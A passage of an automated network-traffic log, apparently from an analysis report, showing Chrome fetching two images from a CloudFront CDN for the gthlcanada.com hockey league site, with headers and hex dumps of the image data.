                                                                                                                          2025-01-13 21:01:20 UTC6393INData Raw: ff 00 86 34 ef 9c ff 00 12 6e 11 c8 de a7 87 b9 39 95 37 11 e6 2b 74 39 94 e0 a5 14 47 dd 7f 7a 4f e8 3e b8 d2 8e 3f e6 8f 32 39 c9 9b b6 77 cc 3e 26 a9 cc 9d 5b f0 e9 f5 e8 a6 88 7b 24 43 61 f7 eb f5 c5 fa 9e a3 8f 07 15 e6 58 7a 37 a3 35 fd 4e 62 f9 23 b2 9f af 9f e1 0d c9 e7 9f c4 9b 26 cb 45 46 43 c9 1c 9b f6 b5 50 63 19 ce 6b 54 a5 2a 1f 74 4e b2 7d f6 18 d1 2e 61 f3 0f 8f 79 ad 9c 49 9d 73 0f 8a ab 33 7a 8b dd 12 49 08 86 2f a2 46 3d 2b fa 0c 2d b2 2f 9b 8b 58 74 42 3a 05 3d c7 be 23 6b 69 0c 36 76 4b 05 dc 03 fb d6 c6 8f 36 bf 26 79 da 67 87 a7 68 3d 27 a4 e9 54 fc 94 de 7e 67 cb 78 be 14 55 3e 59 e6 36 5c 36 1e 75 14 c0 76 fc ae b8 df da e2 54 a3 5b 60 77 db 1c df f8 58 e7 2b 4b c7 dc 7b 94 d4 4c a8 f5 79 6d 34 f1 a5 fa e8 95 81 b7 da e3 1d 23 26
                                                                                                                          Data Ascii: 4n97+t9GzO>?29w>&[{$CaXz75Nb#&EFCPckT*tN}.ayIs3zI/F=+-/XtB:=#ki6vK6&ygh='T~gxU>Y6\6uvT[`wX+K{Lym4#&


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          109192.168.11.204993254.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:20 UTC691OUTGET /app/uploads/gthl/2023/08/31160426/Screen-Shot-2023-08-31-at-4.03.51-PM-e1693512300199-730x640.png HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:20 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/png
                                                                                                                          Content-Length: 605320
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:21 GMT
                                                                                                                          Last-Modified: Thu, 31 Aug 2023 20:05:14 GMT
                                                                                                                          ETag: "634eb1f5d73456c536aeb9cd8cb923d5"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 65e185f36e65abff9322e261be3491d4.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: OdVPEyvFv_raC9xF_hrXEjXh0jrVpZ2EGLKXv6LTHiSO46mnnLWNzQ==
                                                                                                                          2025-01-13 21:01:20 UTC8192INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 da 00 00 02 80 08 06 00 00 00 a2 fb df a2 00 00 80 00 49 44 41 54 78 da ec fd e9 97 24 47 96 e5 89 fd 9e 88 aa 99 f9 ee 1e 7b 04 b6 44 02 89 44 ee 59 dd d9 35 c3 ee 39 cd e9 19 ce 39 3c fc c8 ff 75 48 1e 9e e1 90 9c c3 61 0d ab 3b 3b ab 72 05 12 09 04 80 d8 23 7c 5f 6c 53 15 79 fc 20 a2 aa a2 6a 6a be c4 02 20 ab d3 4f a1 12 11 70 37 57 53 13 15 b9 ef be fb ee 95 df fe d3 ff a2 82 20 22 00 28 4a fa 25 08 62 0d 65 59 62 8d 21 b3 19 ea 3d 45 31 47 8c 80 84 9f 11 63 50 af 08 86 cb 7c 49 fc 7f 82 a0 f5 6f 0d ff 2e 62 50 ad fe 1b 18 23 74 2e 2b 7c 79 05 0d 3f 2b d5 df a9 22 a2 18 63 f0 aa 68 fc c7 18 b3 70 01 2a 06 2f 82 40 fd fe 25 fe 1e 11 41 35 bc be 00 a2 0a ea 11 63 c2 6b 55 f7 4b ba 6f 4c 90 ea 67
                                                                                                                          Data Ascii: PNGIHDRIDATx$G{DDY599<uHa;;r#|_lSy jj Op7WS "(J%beYb!=E1GcP|Io.bP#t.+|y?+"chp*/@%A5ckUKoLg
                                                                                                                          2025-01-13 21:01:20 UTC16384INData Raw: 65 86 a2 9c 61 c5 b0 b5 b9 c9 e6 d6 26 ab ab ab 81 7d 74 be 96 43 56 73 3c 4e 5d 6b af 92 8e f6 96 08 64 89 40 63 69 07 4d 2e 06 db 7d cf 40 03 5e b5 d5 92 6f 49 0b d3 9d a2 4a 6d 96 66 bf 34 55 11 53 31 e4 92 92 4d a9 a4 8d a5 6c f0 f2 62 9d 16 06 a9 fd 97 93 84 eb c5 d7 4d d8 6c e5 b5 0a 88 bb 5d e4 0b 2a fd 76 da f6 79 f1 17 da 3f bf a5 9d 88 78 6d 0d f2 b5 bd a4 1b b2 72 f1 9c 32 98 96 49 82 76 ba 16 e7 3a 81 a4 78 e7 42 c7 11 5d 48 83 6c 9d cd c8 d5 07 2d 3b 89 8f 74 ae 3c 2d b6 6a 32 4e 2f 73 46 76 41 7b 2c 86 23 f9 26 1d 09 9a 48 98 15 0c 86 17 b4 d4 21 d9 a5 6d d9 ba 1e 9e 3d 7a 2d a3 8d ee 6c 11 38 37 2b eb e2 d8 96 94 1c 4f db 31 52 6f 2c 22 e1 94 10 4a c4 58 f2 dc 32 95 20 f8 8f be ea 35 d8 0e 1f 6e dc 6c 8c 62 54 71 1a 06 26 c3 c2 d2 96 57 f8
                                                                                                                          Data Ascii: ea&}tCVs<N]kd@ciM.}@^oIJmf4US1MlbMl]*vy?xmr2Iv:xB]Hl-;t<-j2N/sFvA{,#&H!m=z-l87+O1Ro,"JX2 5nlbTq&W
                                                                                                                          2025-01-13 21:01:20 UTC16384INData Raw: be 5d a0 c5 70 a9 66 f8 d1 d7 6b 2f dc 7b 53 17 4c 46 6d bc 5f c1 c1 5f 22 49 a5 aa 18 0d da 85 8d 95 11 5b ab 2b ec 9d 96 f8 b2 44 ca 39 c3 4c d8 da 5a 87 dc f2 f4 60 8f 3f fd f1 0f 70 76 c6 50 41 a6 13 ac 80 29 3c 3a 76 c8 4c 38 3e 3e 61 32 3e 60 3e 39 c2 cd 4e 28 8a 09 03 35 e4 a3 1c 33 1c f1 d5 83 7d 0e a6 8a cb d6 50 cd 83 65 b4 7a 9c 78 9c 31 94 9a 05 52 d9 29 ae 10 b2 a5 1a 2c 6d 90 64 f5 40 18 da 71 dd ba 84 3b ad 3f da 74 10 0d 53 83 f5 ea c8 f2 c6 c6 17 f1 81 8d b6 26 68 e2 4c 16 1e ee 38 b8 e2 9c 43 4c 58 80 f9 70 10 3e e0 da 2e 46 5a 07 fd ca c0 f1 c1 7b 1b bc 73 3b 1c 4a d5 c2 a7 82 1c d2 80 74 63 06 0c 86 41 b9 2f b1 05 51 2d f2 ba 32 ad 42 00 96 f5 93 ea 4d fb 75 1c e8 6d 86 f5 75 77 94 d2 29 fa 0a c0 d6 81 05 4b 01 fb 77 b3 8d a5 5d 13 e2
                                                                                                                          Data Ascii: ]pfk/{SLFm__"I[+D9LZ`?pvPA)<:vL8>>a2>`>9N(53}Pezx1R),md@q;?tS&hL8CLXp>.FZ{s;JtcA/Q-2BMumuw)Kw]
                                                                                                                          2025-01-13 21:01:20 UTC10847INData Raw: b4 56 44 21 69 51 29 49 bf 3f 60 38 18 72 72 72 e2 03 6c c2 f7 56 a5 3c 2b a5 c8 d6 19 ab f5 1a a5 14 cf 9e 7f cf 8b 17 cf 9b 49 a5 f4 72 10 a5 35 bb 7b 7b e8 48 53 5a c3 64 36 0d f7 7b 75 98 f1 f7 ff 7a bd e2 ab af bf 24 4d 12 7e f7 bb df 51 14 b9 ef ae 3b 57 a7 78 ee ee ed b2 b7 bf 1b ba b7 15 d3 5e 91 17 99 9f 42 0a c5 62 31 e7 37 bf fe 35 5f fe e1 0b 66 33 2f 7b b2 56 20 65 04 d6 23 11 95 92 ec 6c 6f b1 bd b3 cd 62 31 67 3e 9f a1 94 ff 33 22 78 72 a4 14 8c 77 c7 44 b1 e6 f2 e2 82 8b 8b 73 44 90 dd d4 35 80 14 ec ee 8e 49 92 b8 ee 88 0b e1 d9 d6 3e 40 a8 0a 4f f2 87 0a a9 34 69 27 e5 d1 a3 07 dc be 7d d3 eb d8 4d c1 d7 5f 7f c5 6c 3a f5 04 9b 2c e7 e8 e8 08 63 4a fc 08 d5 7a 0d b6 75 24 69 cc 2f 7e f1 73 3e fc e8 71 7d dd 6a c4 5e 90 e1 34 46 44 57 3f
                                                                                                                          Data Ascii: VD!iQ)I?`8rrrlV<+Ir5{{HSZd6{uz$M~Q;Wx^Bb175_f3/{V e#lob1g>3"xrwDsD5I>@O4i'}M_l:,cJzu$i/~s>q}j^4FDW?
                                                                                                                          2025-01-13 21:01:20 UTC16384INData Raw: bc bc e4 d5 ab 57 3c fd ee 7b 76 77 6f 70 ff 49 9f 27 1f 1c 32 de 1e a2 d0 c4 da 91 76 35 07 07 8f 50 7a c1 f9 f4 94 f5 32 c7 96 8e 9d ed 9c c9 74 4e 51 da 10 ae e3 fc 88 ba 8a 58 af f8 ed b6 f9 1c 36 e8 3d 45 60 f1 5e e5 91 57 9b 9c 6a c5 4d 37 86 4e 1b 8a 97 6a 62 e1 13 cc 94 54 38 1d b5 c2 29 7c 17 da 07 f2 48 9f c6 25 65 6d cc 31 a6 24 8a 52 6e de bc c5 eb d7 6f 02 fa 2f 84 0c 95 1e a9 28 82 8e 36 49 12 f6 6f 1c 70 fb ee ed 46 67 58 4f 1e 6c 1d 4e f4 63 f8 a9 7f ba c0 1a 01 4e e1 aa 43 bd b0 78 22 b5 45 61 50 da 3b d7 f3 6c c9 7c 76 c9 6a 31 c5 5a 89 12 82 87 37 0e d9 1e 7c 84 95 82 fe b0 43 14 19 ce 8e 5e 31 bf 3c 25 92 8a 51 7f 87 d1 70 97 b3 c9 84 93 b7 a7 d8 c2 a1 d1 a8 58 63 2d 08 ad d1 69 42 9a 78 9c 59 24 2c b1 2b 89 6d 4e 64 d6 e0 ca 60 46 ae
                                                                                                                          Data Ascii: W<{vwopI'2v5Pz2tNQX6=E`^WjM7NjbT8)|H%em1$Rno/(6IopFgXOlNcNCx"EaP;l|vj1Z7|C^1<%QpXc-iBxY$,+mNd`F
                                                                                                                          2025-01-13 21:01:20 UTC1336INData Raw: bf dd 46 fe 04 35 d3 a5 62 dc fb 3c 10 15 bc 1b 36 74 b4 c1 c7 4b 3b 8b 94 06 45 49 99 cf 99 cf 2e 58 cc 2e 30 76 e5 c7 31 2a 0d fa 41 42 27 5a 22 a4 c2 5a 89 92 31 e3 f1 2d b6 b6 6e 30 3d 9b f2 b7 bf f9 1c 3b 5d 11 2b 0d 45 49 2c a4 5f c3 45 9b e2 e1 f0 f2 32 eb 17 bf 3c 63 91 2f d9 bd 7d c0 bd f9 03 2e 8e de d2 55 9a 41 a7 cb 60 34 60 67 7f 9b d1 4e 1f a1 2d ab f5 d2 a3 a4 54 c2 68 f7 16 52 0f 10 4e fb 40 0f 67 ff 74 7b 2e ad 62 75 03 8b e0 9a 8e 33 ad 85 55 fc d0 c3 d0 32 eb 61 eb 85 b2 4a 13 6b d3 1d de 6b a3 dd 38 c1 8b ba 13 7b 75 94 de 84 a7 54 7f 56 d6 05 53 7d 7a 73 36 e8 cb c2 03 e4 44 d8 fc 5b 90 77 eb 93 00 9b cd b2 39 11 37 3c e9 30 fa 77 9b d8 c4 ea e7 34 4c de b0 ec 57 51 ba 61 f4 e8 da 28 39 21 c3 1f b5 ad cf b9 59 64 23 a8 75 db fe fd 69
                                                                                                                          Data Ascii: F5b<6tK;EI.X.0v1*AB'Z"Z1-n0=;]+EI,_E2<c/}.UA`4`gN-ThRN@gt{.bu3U2aJkk8{uTVS}zs6D[w97<0w4LWQa(9!Yd#ui
                                                                                                                          2025-01-13 21:01:20 UTC1418INData Raw: 8d 4a 04 8f db 52 33 26 71 8c 8e 22 e2 24 a6 db ef b1 b3 b3 c3 78 3c 66 30 18 32 9d 4e 58 ad 82 69 52 36 69 90 95 1e cf 9b 19 5d 90 91 35 ba b9 fa bd 0b 4f 3b 91 b2 0a b0 f1 d7 bf 2c 4a b2 f5 1a b5 b3 e5 a3 72 5b 9d 67 b1 f9 4d fb 03 b7 6b 26 1c 55 d8 52 45 61 11 75 22 98 ab cd 95 f5 b3 25 ae 6c 48 ed c9 cd fb 50 80 7f 54 a4 78 e8 e6 6f dc 23 be 80 06 48 7a db f4 72 d0 ab 25 5b a3 11 fd c1 80 d2 09 f2 d2 8f f3 9d 68 12 43 45 98 10 48 a1 82 06 57 a2 a3 98 fd bd 6d 7e f6 e4 1e af 4e 66 9c 4d 96 64 76 89 12 c1 74 27 34 ce 6a 4a 11 05 79 40 89 73 19 52 1a b2 7c 41 e9 0c b7 ef de a4 34 0b 5e be fc 0e 67 72 74 04 4a f9 0e ae 54 92 4e a7 43 b7 d3 65 7b bb cf ee ee 90 ed ed 11 69 da 47 eb 84 b2 ac 0e 38 21 7c 4c b8 56 07 5f 6c 8a eb 7f 62 d1 e4 35 b5 6a c3 ec cb
                                                                                                                          Data Ascii: JR3&q"$x<f02NXiR6i]5O;,Jr[gMk&UREau"%lHPTxo#Hzr%[hCEHWm~NfMdvt'4jJy@sR|A4^grtJTNCe{iG8!|LV_lb5j
                                                                                                                          2025-01-13 21:01:20 UTC16384INData Raw: 11 cf 8c 46 9c 73 f4 97 cf d1 88 33 87 12 45 2d a4 38 64 f5 f4 52 55 99 95 0b 32 01 bc 25 16 77 37 bb 77 7e b8 66 ee e6 1e 1e 6f c9 a5 ba ba d8 e0 69 56 02 78 78 2f c2 c3 dd ec b3 ef 7e 0b 4f 1d 10 c4 94 23 c8 8b c8 c9 f1 e0 93 42 49 d3 81 95 52 e5 7c 62 cb 9d 19 bc 49 2c 13 3d ac 03 bc b3 ea 1f 25 d3 9c 72 54 40 19 e4 1c 5c ed ad 80 28 43 1a 59 76 a8 9d 62 69 ef 05 ab aa 0b a4 08 26 be a5 b9 cf 25 47 47 66 ef 4f 09 d0 cb a8 40 1a 64 83 c7 80 2e 6b 93 33 19 95 7d 2a 8e 39 ad 42 3a 48 e8 74 a1 7d 5a ef 39 34 e8 09 c0 4c 4f 8c 30 39 26 8a 1e 5e 0f 97 cc 83 99 d1 2e d9 ea 69 eb a3 0e de 89 89 4e fe 11 af 77 4c 84 b9 87 c5 2c 3f eb ac 93 5f 30 c2 3f 56 56 73 2c 3d 59 60 bf f5 d8 f4 88 99 56 9c 8e d6 a8 fc e7 3a e9 5d 29 99 ef aa aa 86 b4 bb e1 ba c9 58 ba e6
                                                                                                                          Data Ascii: Fs3E-8dRU2%w7w~foiVxx/~O#BIR|bI,=%rT@\(CYvbi&%GGfO@d.k3}*9B:Ht}Z94LO09&^.iNwL,?_0?VVs,=Y`V:])X
                                                                                                                          2025-01-13 21:01:20 UTC16384INData Raw: a0 25 b1 dc 6e d0 3a e7 d1 76 8e 57 d2 a4 cf b6 bc 13 1b fd f6 51 71 e8 03 f6 fb 16 6d 61 88 64 22 54 be 02 31 a3 f2 35 54 03 fa 3e 15 7f 28 8d 11 9a 44 f0 6c 87 87 9c 6a a0 60 20 47 12 fa 0a a2 84 43 d7 d9 21 c0 7b ab a4 16 1b 8f 86 60 0b ee 7e bf 47 df f7 d8 ed 77 c3 e8 13 df 3a a2 ea 1f 7e 7d 5b 90 3d ad 6b 9e 56 15 ff 9d bf 36 dc 9f 90 94 9f df 41 f6 90 1a 8b 7b 32 c3 f1 87 3f f9 31 7a 69 f1 cb 5f fc 35 76 db 5b 34 20 f8 e1 34 37 ee 1d 22 62 d1 7b d9 77 93 db 52 f3 1a 29 e3 98 df 62 ee 62 1a fb 5a 22 16 04 e8 82 60 df 76 d8 77 01 77 fb 3d ba 28 20 e7 e0 2b 8f cd 7a 8d f3 b3 0d 36 ab 06 0d db 7e 73 e8 3a b4 21 e2 66 77 c0 db 9b 3b 7c 73 7d 8b 5e ac 34 2a aa 62 55 d7 a0 da 61 db 45 1c e2 1e a2 02 ef bd 6d fa c9 7c 2c 12 70 7e 7e 6e 19 d7 12 51 79 46 1b
                                                                                                                          Data Ascii: %n:vWQqmad"T15T>(Dlj` GC!{`~Gw:~}[=kV6A{2?1zi_5v[4 47"b{wR)bbZ"`vww=( +z6~s:!fw;|s}^4*bUaEm|,p~~nQyF
                                                                                                                          2025-01-13 21:01:20 UTC1024INData Raw: 84 5e 06 55 92 b4 d7 9e 07 03 65 d3 34 e8 a9 87 24 8d 76 ee e8 24 66 00 f3 07 e4 74 f8 fc 62 08 bb 1e 33 da b6 66 c8 20 17 39 85 03 46 e3 e7 54 9a 42 0f 16 65 d0 e3 23 03 8f a6 05 c5 c2 a0 f7 ed ae b6 31 54 6c 63 3b df 78 70 c5 56 93 ac 0a c7 15 56 ce e1 ac aa d1 54 3e 15 09 a5 ba 72 76 a6 79 96 de da f5 88 4d e6 63 7d 0b 26 17 e9 ba f4 59 d9 fd 5a 55 16 1b a5 39 0a c6 59 63 5a be 77 24 49 22 5c be 66 92 98 71 ae 40 2e 3b d7 4d f2 91 f5 68 4c 74 bc 08 95 43 12 2d c6 b1 e9 9e 73 ec 52 11 86 26 86 de 72 b6 8d 6d b1 4d 3a 88 a0 ef 5b 78 62 a8 5a 5b 66 5d 31 62 e8 d0 07 1b 9f 57 95 43 0b 93 37 35 75 85 cd ba 01 98 ad 58 83 81 be 3b 0c 65 36 aa 36 aa 06 60 a6 28 e7 ed 1a 26 d9 0e c3 0e 27 de 01 9e 3d d6 75 8d c6 7b ac eb 0a a1 55 38 c7 a8 1c 0f 6c c6 b0 26 50
                                                                                                                          Data Ascii: ^Ue4$v$ftb3f 9FTBe#1Tlc;xpVVT>rvyMc}&YZU9YcZw$I"\fq@.;MhLtC-sR&rmM:[xbZ[f]1bWC75uX;e66`(&'=u{U8l&P


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          110192.168.11.204993454.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:20 UTC661OUTGET /app/uploads/gthl/2023/06/26135230/GTHL-PrideParade2023-730x548.jpeg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:20 UTC488INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 111059
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:21 GMT
                                                                                                                          Last-Modified: Mon, 26 Jun 2023 17:52:32 GMT
                                                                                                                          ETag: "95a8b191ac15e774984b63d2ba3e3e23"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 ec8b1bfbf511818c606f196b49f871e2.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: hInjkXDeBp2jVR7-4Fkpr8pG6vrS5rZOohZDWfwbBHDLFr_LrwIU3w==
                                                                                                                          2025-01-13 21:01:20 UTC15896INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 48 00 48 00 00 ff db 00 43 00 06 04 04 05 04 04 06 05 05 05 06 06 06 07 09 0e 09 09 08 08 09 12 0d 0d 0a 0e 15 12 16 16 15 12 14 14 17 1a 21 1c 17 18 1f 19 14 14 1d 27 1d 1f 22 23 25 25 25 16 1c 29 2c 28 24 2b 21 24 25 24 ff db 00 43 01 06 06 06 09 08 09 11 09 09 11 24 18 14 18 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 ff c0 00 11 08 02 24 02 da 03 01 22 00 02 11 01 03 11 01 ff c4 00 1d 00 00 02 03 01 01 01 01 01 00 00 00 00 00 00 00 00 05 06 03 04 07 02 01 00 08 09 ff c4 00 50 10 00 02 01 03 03 02 03 06 03 06 03 06 03 06 01 0d 01 02 03 00 04 11 05 12 21 06 31 13 41 51 07 14 22 61 71 81 32 91 a1 15 23 42
                                                                                                                          Data Ascii: JFIFHHC!'"#%%%),($+!$%$C$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$"P!1AQ"aq2#B
                                                                                                                          2025-01-13 21:01:20 UTC1114INData Raw: 76 2d 18 ca e0 3b 9c 6d 62 50 1f cb 19 fb d3 8d be a7 75 77 d5 fa c4 33 a4 71 ea 96 5a 72 c6 32 7f 77 3b 8d db f8 f4 61 c8 fa d3 b4 7d 31 5b be a8 13 d9 a5 bf bd 5f dc e6 d7 df 50 4f b8 32 30 0e a7 d7 e9 5b ea f6 1f 4a c0 3d 97 dc 46 ba bd c0 92 59 6d e5 32 9c 4b 08 25 7f e5 23 d0 d6 fe bd 87 d2 8a df 54 a2 76 9e d7 d5 f5 7d 5d 2d 3e aa da 97 fe ea f5 66 aa 6a 9c 5a 37 7a 91 de 55 bb 18 b1 a9 5c bd 8d 91 b8 89 4b 49 e2 24 6b 8c 70 49 ef cf a5 2d 7b 41 bd db a3 aa 6e dd 2d c4 e0 8f 52 07 fd 68 ee b9 30 36 51 c1 1c 8a b2 b5 d4 47 04 0c 81 9e ff 00 f7 eb 59 bf 5c f5 42 36 bf 28 5d c8 ba 72 ed 8f 70 c0 66 ed c7 df fa 52 3a a6 26 ef 71 e0 43 69 8a ad 59 f9 82 23 b7 9e e6 7b 9b 58 26 6b 72 1a 30 f2 21 39 3f 87 8f cf 26 96 75 46 dd 75 1a 00 5e 52 fc b0 ee 46 ec
                                                                                                                          Data Ascii: v-;mbPuw3qZr2w;a}1[_PO20[J=FYm2K%#Tv}]->fjZ7zU\KI$kpI-{An-Rh06QGY\B6(]rpfR:&qCiY#{X&kr0!9?&uFu^RF
                                                                                                                          2025-01-13 21:01:20 UTC12792INData Raw: 7c bb 64 0a 6a cd 2e a1 f0 e8 99 07 c8 90 58 67 98 06 f2 7d 46 3e 9e dd a8 59 c8 ce 22 31 2c ec 42 a2 82 c0 f2 be 7e 54 1b a5 ed 0d a6 a3 ef 12 32 c4 92 60 88 62 8d a4 59 54 30 27 03 b8 07 1f a5 30 5e e9 ba a5 e5 c9 b6 d4 56 fe e2 de 66 0a 90 20 ca a8 3d c6 47 6f 97 a5 43 6f a1 dd 58 b8 bb b5 b9 b9 b3 48 63 7f dc dc c8 31 08 04 e0 67 cf 8c f6 f9 50 0b ba 1d ae a4 7e b2 f9 1d e3 3b 6b 16 76 73 39 b9 d2 96 28 6e 49 3f 08 5c 33 73 f0 9e 06 0e 4e 08 3e 82 96 35 3e be 6d 4a ce 5b 55 d2 21 b3 55 1b 55 f6 fc 24 f9 8f 4a f6 7b 5b eb eb 17 8a da e5 ae 64 12 04 90 a3 e4 20 6c 9c 73 db b7 a5 57 d2 fa 6b 57 bd 67 8e d6 c6 49 10 fc 2b 24 aa 11 50 79 96 3e 74 c2 25 96 f0 a0 ce 36 01 04 69 1a a4 da 3d ea 5c 58 dd 19 16 26 e2 31 f0 a9 3e 60 1f a1 35 2d f6 bb 35 ec 6d 14
                                                                                                                          Data Ascii: |dj.Xg}F>Y"1,B~T2`bYT0'0^Vf =GoCoXHc1gP~;kvs9(nI?\3sN>5>mJ[U!UU$J{[d lsWkWgI+$Py>t%6i=\X&1>`5-5m
                                                                                                                          2025-01-13 21:01:20 UTC4616INData Raw: 1b 89 e5 bb b8 c8 78 a5 da b0 64 aa b8 d8 09 c9 1d b9 24 51 eb 6d 27 a4 9e d8 4d 1c d6 e8 4c 68 b2 c9 3b e5 94 b0 da 71 93 fc cb 9c f9 06 a0 2a e0 f7 9c 3b c4 0b 1d 3a de d1 1d a3 5b 66 56 6d c4 6d c9 03 d0 13 e5 46 7a 2a ca da 6d 77 c5 86 09 17 c3 dc f9 3c 05 3f f6 6b 9d 42 7b 69 75 eb f9 43 45 ee a8 c1 22 d8 ca 43 05 00 0e 50 00 df 95 32 f4 50 8a 77 92 48 d0 2a 82 14 1c 72 7c cf f6 a9 ce 09 12 c9 de 2b 7b 50 bb 92 ef ac 6c 2c a0 43 23 5a 42 1b 60 19 cb 1c b7 6f a0 15 73 42 b9 be d6 21 81 35 2b 48 21 4b 79 4b 05 09 b7 93 e6 45 01 bf 98 ea fd 6b ac de e4 95 85 99 54 a9 c1 c0 21 07 f4 a2 fa 65 d1 94 2c 6a 84 92 70 31 db eb f5 ab dc c5 70 04 82 4c fd 4f ec d2 f2 da c3 a3 24 91 59 43 aa c9 21 fb 0e 3e 95 16 8d ed 0c c9 a9 45 a7 97 f7 83 23 00 d2 31 ed f4 a0
                                                                                                                          Data Ascii: xd$Qm'MLh;q*;:[fVmmFz*mw<?kB{iuCE"CP2PwH*r|+{Pl,C#ZB`osB!5+H!KyKEkT!e,jp1pLO$YC!>E#1
                                                                                                                          2025-01-13 21:01:20 UTC12792INData Raw: ba 3f e5 ee 46 6a bf fe 1f 75 79 b5 6d 2f 5e 9a e3 39 9a ef c6 19 f4 65 c7 f6 a6 2d 66 5b 9b 61 3d e5 85 ac d7 17 56 72 c3 77 10 89 80 39 5c 06 53 93 92 0a e7 ee 28 56 a8 0c 33 0f a7 76 19 d9 14 2c 3a 2b 54 90 dc 5d 24 6d 25 cd 8c e0 cb 06 30 e5 03 7e 30 a7 9c 62 a1 d4 2d 27 d2 75 c4 d7 e3 75 68 4d 84 e1 f2 02 f8 6c 91 b1 03 bf 39 f2 fa 51 0b de a6 93 a7 35 ab 8d 6b 5a 9f ff 00 69 08 3c 65 b7 de 4b 31 93 f0 29 ff 00 cc 0e 3d 28 5e a5 ed 1e e2 fb a6 f5 0d 2d 74 1b 38 57 57 53 0a 5d c2 c5 ca 31 3c e4 11 e6 32 38 f5 ab 02 c0 81 8c 88 1d aa c0 9f 33 36 d2 11 cc 2b 2b b2 47 0a 4c 9e 2c 8e 48 d9 9c f9 fd 8d 32 0d 0e 6d 72 ee ce de 17 5b d6 94 b2 43 e0 c4 c5 bf 11 ce 57 39 aa 2d 68 17 a2 f5 94 23 6c b6 f2 db 96 ff 00 cc c3 fb d0 2e 9f d7 f5 fd 17 58 06 da e2 68
                                                                                                                          Data Ascii: ?Fjuym/^9e-f[a=Vrw9\S(V3v,:+T]$m%0~0b-'uuhMl9Q5kZi<eK1)=(^-t8WWS]1<2836++GL,H2mr[CW9-h#l.Xh
